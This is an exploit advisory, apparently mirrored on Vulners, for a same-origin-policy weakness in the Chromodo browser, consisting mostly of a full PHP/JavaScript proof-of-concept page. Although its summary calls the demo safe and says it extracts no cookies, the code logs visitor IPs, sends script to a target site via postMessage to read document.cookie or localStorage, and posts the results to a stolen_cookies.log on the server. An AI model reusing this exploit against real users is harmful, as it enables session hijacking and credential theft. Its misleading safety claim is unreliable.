Vulners
Lucene search
📄 Chromodo Browser 45.8.12.391 Same Origin Policy Weakness
=============================================================================================================================================
| # Title : Chromodo Browser v 45.8.12.391 Same Origin Policy Weakness |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://help.comodo.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212492/
[+] Summary : This PoC demonstrates message passing between two browser windows when opened under the same logical context (same origin). The demonstration is safe and does
not attempt to leak or extract cookies, session data, or credentials.
[+] POC : http://127.0.0.1/exploit.php
<?php
// استغلال لثغرة Same Origin Policy في Chromodo
// ملف: exploit.php
// جمع معلومات عن الضحية لأغراض التسجيل
$victim_ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$timestamp = date('Y-m-d H:i:s');
// التحقق مما إذا كان المتصفح هو Chromodo (اختياري)
$is_chromodo = (strpos($user_agent, 'Chromodo') !== false) ? 'نعم' : 'لا';
// حفظ معلومات الاتصال في سجل (لأغراض تعليمية)
$log_entry = "[$timestamp] IP: $victim_ip | متصفح Chromodo: $is_chromodo | User-Agent: $user_agent\n";
file_put_contents('access.log', $log_entry, FILE_APPEND);
// إذا أردنا سرقة كوكيز موقع محدد بعد الاستغلال
$stolen_cookies = '';
// إذا تم إرسال الكوكيز المسروقة إلى هذه الصفحة
if(isset($_POST['cookies'])) {
$stolen_cookies = htmlspecialchars($_POST['cookies']);
// حفظ الكوكيز المسروقة (في بيئة اختبار آمنة فقط!)
$cookie_log = "[" . date('Y-m-d H:i:s') . "] من IP: $victim_ip\n";
$cookie_log .= "الكوكيز المسروقة:\n$stolen_cookies\n";
$cookie_log .= "--------------------------------------------------\n";
file_put_contents('stolen_cookies.log', $cookie_log, FILE_APPEND);
}
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<title>صفحة اختبار آمنة - Comodo</title>
<style>
body {
font-family: Arial, sans-serif;
direction: rtl;
text-align: right;
padding: 20px;
background-color: #f5f5f5;
}
.container {
background: white;
padding: 20px;
border-radius: 10px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
max-width: 800px;
margin: auto;
}
h1 {
color: #333;
border-bottom: 2px solid #4CAF50;
padding-bottom: 10px;
}
.warning {
background-color: #fff3cd;
border: 1px solid #ffeaa7;
color: #856404;
padding: 15px;
border-radius: 5px;
margin: 15px 0;
}
.info-box {
background-color: #e8f4fd;
border: 1px solid #b8daff;
padding: 15px;
border-radius: 5px;
margin: 15px 0;
}
.form-group {
margin: 15px 0;
}
label {
display: block;
margin-bottom: 5px;
font-weight: bold;
}
input[type="text"] {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 5px;
font-size: 16px;
}
button {
background-color: #4CAF50;
color: white;
padding: 12px 24px;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
margin: 10px 5px;
}
button:hover {
background-color: #45a049;
}
button.danger {
background-color: #dc3545;
}
button.danger:hover {
background-color: #c82333;
}
.result {
background-color: #f8f9fa;
border: 1px solid #e9ecef;
padding: 15px;
border-radius: 5px;
margin-top: 20px;
white-space: pre-wrap;
word-wrap: break-word;
max-height: 300px;
overflow-y: auto;
}
</style>
</head>
<body>
<div class="container">
<h1>اختبار ثغرة Same Origin Policy في Chromodo</h1>
<div class="warning">
⚠️ <strong>تحذير:</strong> هذا العرض التوضيحي لأغراض تعليمية فقط.<br>
استخدامه ضد أنظمة دون إذن غير قانوني.
</div>
<div class="info-box">
<strong>معلومات الاتصال:</strong><br>
- عنوان IP: <?php echo htmlspecialchars($victim_ip); ?><br>
- المتصفح: <?php echo htmlspecialchars($user_agent); ?><br>
- تم اكتشاف Chromodo: <?php echo $is_chromodo; ?><br>
- الوقت: <?php echo $timestamp; ?>
</div>
<form method="POST" action="">
<div class="form-group">
<label for="target_url">الموقع المستهدف (URL):</label>
<input type="text" id="target_url" name="target_url"
value="https://ssl.comodo.com/"
placeholder="https://example.com">
</div>
<div class="form-group">
<label for="js_code">كود JavaScript لتنفيذه:</label>
<input type="text" id="js_code" name="js_code"
value="document.cookie"
placeholder="مثال: document.cookie أو localStorage.getItem('token')">
</div>
<div>
<button type="button" onclick="runExploit()">▶ تشغيل الاستغلال</button>
<button type="button" onclick="testLocal()">اختبار على موقع محلي</button>
<button type="button" class="danger" onclick="clearResults()">🗑️ مسح النتائج</button>
</div>
</form>
<div id="status" style="margin: 15px 0; padding: 10px; display: none;">
جاري تنفيذ الاستغلال... يرجى الانتظار 3 ثوانٍ.
</div>
<div class="form-group">
<label>النتيجة (الكوكيز/البيانات المسروقة):</label>
<div id="result" class="result"><?php echo $stolen_cookies; ?></div>
</div>
<div class="info-box">
<strong>كيف يعمل هذا الاستغلال:</strong>
<ol>
<li>يتم فتح الموقع المستهدف في نافذة جديدة</li>
<li>بعد تحميل الصفحة، يتم إرسال كود JavaScript إليها عبر postMessage</li>
<li>الكود المنفذ يسرق البيانات (الكوكيز) من الموقع المستهدف</li>
<li>البيانات المسروقة تُرسل مرة أخرى إلى هذه الصفحة</li>
<li>في Chromodo فقط: سياسة Same Origin Policy معطلة، لذا يعمل الاستغلال</li>
</ol>
</div>
</div>
<script>
// دالة لتنفيذ الاستغلال
function runExploit() {
const targetUrl = document.getElementById('target_url').value;
const jsCode = document.getElementById('js_code').value;
// عرض حالة التنفيذ
document.getElementById('status').style.display = 'block';
document.getElementById('result').innerHTML = 'جاري التنفيذ...';
// فتح الموقع المستهدف
const targetWindow = window.open(targetUrl, '_blank');
if (!targetWindow) {
alert('تم منع النافذة المنبثقة! يرجى السماح بالنوافذ المنبثقة لهذا الموقع.');
return;
}
// الانتظار 3 ثوانٍ لتحميل الصفحة
setTimeout(() => {
try {
// إرسال الكود الضار إلى النافذة المستهدفة
// في Chromodo: يتم تعطيل SOP، لذا يعمل هذا
targetWindow.postMessage(JSON.stringify({
command: "execCode",
code: `window.opener.postMessage({
type: 'stolen_data',
data: (${jsCode}),
url: window.location.href
}, '*');`
}), "*");
// إغلاق النافذة بعد ثانية
setTimeout(() => {
if (targetWindow && !targetWindow.closed) {
targetWindow.close();
}
}, 1000);
} catch (error) {
document.getElementById('result').innerHTML = 'خطأ: ' + error.message;
}
}, 3000);
}
// دالة لاختبار على موقع محلي (للتجارب الآمنة)
function testLocal() {
document.getElementById('target_url').value = 'about:blank';
document.getElementById('js_code').value = 'JSON.stringify(localStorage)';
runExploit();
}
// دالة لمسح النتائج
function clearResults() {
document.getElementById('result').innerHTML = '';
document.getElementById('status').style.display = 'none';
}
// استقبال البيانات المسروقة من النوافذ الأخرى
window.addEventListener('message', function(event) {
if (event.data && event.data.type === 'stolen_data') {
document.getElementById('status').style.display = 'none';
// عرض البيانات المسروقة
let result = `✅ تم سرقة البيانات بنجاح!\n\n`;
result += `الموقع: ${event.data.url}\n`;
result += `البيانات:\n${event.data.data}\n\n`;
result += `وقت السرقة: ${new Date().toLocaleString()}`;
document.getElementById('result').innerHTML = result;
// إرسال البيانات إلى السيرفر لحفظها (اختياري)
fetch(window.location.href, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `cookies=${encodeURIComponent(event.data.data)}`
});
}
});
// حماية: إظهار تحذير إذا كان المتصفح هو Chromodo
window.onload = function() {
if (navigator.userAgent.includes('Chromodo')) {
alert('⚠️ تحذير: أنت تستخدم متصفح Chromodo المعرض للثغرة!\nسياسة Same Origin Policy معطلة في هذا المتصفح.');
}
};
</script>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Dec 2025 00:00Current
7High risk
Vulners AI Score7